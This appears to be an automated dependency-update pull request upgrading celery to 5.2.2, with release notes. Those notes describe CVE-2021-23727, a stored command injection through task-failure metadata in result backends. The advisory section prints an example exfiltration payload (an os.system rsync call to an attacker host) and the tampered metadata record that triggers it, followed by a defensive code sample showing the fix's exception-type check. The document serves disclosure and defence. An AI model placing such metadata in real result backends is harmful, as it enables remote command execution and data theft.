This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.
Release Notes
celery/celery (celery)
### [`v5.2.2`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#522)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.2.1...v5.2.2)
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz
- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in [#4836](https://redirect.github.com/celery/celery/issues/4836).
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
`os.system("rsync /data attacker@192.168.56.100:~/data")`
by setting the task's result to a failure in the result backend, with `os` as the exception module,
the `system` function as the exception type and the payload `rsync /data attacker@192.168.56.100:~/data` as the exception arguments, like so:
```python
{
    "exc_module": "os",
    "exc_type": "system",
    "exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
```
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
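The check the changelog describes, as an added example that is not Celery's own code: a result record naming `os.system` resolves to a callable, but the fix only accepts a type that subclasses `BaseException`, so the record is refused before anything is instantiated. The metadata dicts, the `BackendSecurityError` class and the helper names are constructed for this example; lookups go through `sys.modules` only, so a stored record cannot trigger an import.

```python
import sys
import os  # loaded so the constructed sample below is found in sys.modules

# Constructed sample records, in the shape the changelog describes.
LEGIT_META = {"exc_module": "builtins", "exc_type": "KeyError",
              "exc_message": ["user_id"]}
TAMPERED_META = {"exc_module": "os", "exc_type": "system",
                 "exc_message": "echo constructed-sample"}
UNKNOWN_META = {"exc_module": "no_such_module_xyz", "exc_type": "Boom",
                "exc_message": "from consumer code base"}


class BackendSecurityError(Exception):
    """Raised when stored failure metadata does not name an exception class."""


def resolve_exception_class(exc_module, exc_type):
    """Find the class the metadata names, consulting only modules already
    in sys.modules so a stored record cannot trigger an import.  A missing
    module or attribute yields a placeholder class, which is what a
    consumer-only exception type looks like on the producer side."""
    if exc_module is None:
        return type(exc_type, (Exception,), {})
    try:
        obj = sys.modules[exc_module]
        for name in exc_type.split("."):  # allow Outer.Inner qualified names
            obj = getattr(obj, name)
    except (KeyError, AttributeError):
        return type(exc_type, (Exception,), {})
    return obj


def exception_from_metadata(meta):
    """Rebuild the stored failure; refuse anything that is not an exception."""
    cls = resolve_exception_class(meta.get("exc_module"), meta["exc_type"])
    msg = meta.get("exc_message", "")
    # The condition the 5.2.2 fix adds: os.system resolves to a callable,
    # but it is not an exception class, so it is rejected before being called.
    if not isinstance(cls, type) or not issubclass(cls, BaseException):
        raise BackendSecurityError(
            f"expected an exception class, got {meta.get('exc_module')}.{meta['exc_type']}")
    args = tuple(msg) if isinstance(msg, (list, tuple)) else (msg,)
    return cls(*args)


def is_rejected(meta):
    """True when the record is refused before any object is constructed."""
    try:
        exception_from_metadata(meta)
    except BackendSecurityError:
        return True
    return False
```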
### [`v5.2.1`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#521)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.2.0...v5.2.1)
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent ([#7052](https://redirect.github.com/celery/celery/issues/7052))
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case ([#7077](https://redirect.github.com/celery/celery/issues/7077)).
- fix: task expiration is timezone aware if needed ([#7065](https://redirect.github.com/celery/celery/issues/7065)).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.
### [`v5.2.0`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#520)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.2...v5.2.0)
Release date: 2021-11-08 7.15 A.M UTC+6:00
Release by: Asif Saif Uddin
- Prevent from subscribing to empty channels ([#7040](https://redirect.github.com/celery/celery/issues/7040))
- fix register_task method.
- Fire task failure signal on final reject ([#6980](https://redirect.github.com/celery/celery/issues/6980))
- Limit pymongo version: <3.12.1 ([#7041](https://redirect.github.com/celery/celery/issues/7041))
- Bump min kombu version to 5.2.1
### [`v5.1.2`](https://redirect.github.com/celery/celery/releases/tag/v5.1.2)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.1...v5.1.2)
Release date: 2021-06-28 16.15 P.M UTC+3:00
Release by: Omer Katz
- When chords fail, correctly call errbacks. ([#6814](https://redirect.github.com/celery/celery/issues/6814))
> We had a special case for calling errbacks when a chord failed
> which assumed they were old style. This change ensures that we
> call the proper errback dispatch method which understands new and
> old style errbacks, and adds test to confirm that things behave as
> one might expect now.
- Avoid using the `Event.isSet()` deprecated alias. ([#6824](https://redirect.github.com/celery/celery/issues/6824))
- Reintroduce sys.argv default behaviour for `Celery.start()`. ([#6825](https://redirect.github.com/celery/celery/issues/6825))
### [`v5.1.1`](https://redirect.github.com/celery/celery/releases/tag/v5.1.1)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.0...v5.1.1)
Release date: 2021-06-17 16.10 P.M UTC+3:00
Release by: Omer Katz
- Fix `--pool=threads` support in command line options parsing. ([#6787](https://redirect.github.com/celery/celery/issues/6787))
- Fix `LoggingProxy.write()` return type. ([#6791](https://redirect.github.com/celery/celery/issues/6791))
- Couchdb key is now always coerced into a string. ([#6781](https://redirect.github.com/celery/celery/issues/6781))
- grp is no longer imported unconditionally. (#6804) This fixes a regression in 5.1.0 when running Celery on non-Unix systems.
- Ensure regen utility class gets marked as done when concretised. ([#6789](https://redirect.github.com/celery/celery/issues/6789))
- Preserve call/errbacks of replaced tasks. ([#6770](https://redirect.github.com/celery/celery/issues/6770))
- Use single-lookahead for regen consumption. ([#6799](https://redirect.github.com/celery/celery/issues/6799))
- Revoked tasks are no longer incorrectly marked as retried. ([#6812](https://redirect.github.com/celery/celery/issues/6812), [#6816](https://redirect.github.com/celery/celery/issues/6816))
### [`v5.1.0`](https://redirect.github.com/celery/celery/releases/tag/v5.1.0)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.6...v5.1.0)
Release date: 2021-05-23 19.20 P.M UTC+3:00
Release by: Omer Katz
- `celery -A app events -c camera` now works as expected. ([#6774](https://redirect.github.com/celery/celery/issues/6774))
- Bump minimum required Kombu version to 5.1.0.
### [`v5.0.6`](https://redirect.github.com/celery/celery/compare/v5.0.5...v5.0.6)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.5...v5.0.6)
### [`v5.0.5`](https://redirect.github.com/celery/celery/compare/v5.0.4...v5.0.5)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.4...v5.0.5)
### [`v5.0.4`](https://redirect.github.com/celery/celery/compare/v5.0.3...v5.0.4)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.3...v5.0.4)
### [`v5.0.3`](https://redirect.github.com/celery/celery/compare/v5.0.2...v5.0.3)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.2...v5.0.3)
### [`v5.0.2`](https://redirect.github.com/celery/celery/compare/v5.0.1...v5.0.2)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.1...v5.0.2)
### [`v5.0.1`](https://redirect.github.com/celery/celery/compare/v5.0.0...v5.0.1)
[Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.0...v5.0.1)
### [`v5.0.0`](https://redirect.github.com/celery/celery/compare/v4.4.7...v5.0.0)
[Compare Source](https://redirect.github.com/celery/celery/compare/v4.4.7...v5.0.0)
Configuration
📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR contains the following updates: `==4.4.7` -> `==5.2.2`
GitHub Vulnerability Alerts
CVE-2021-23727
This PR was generated by Mend Renovate.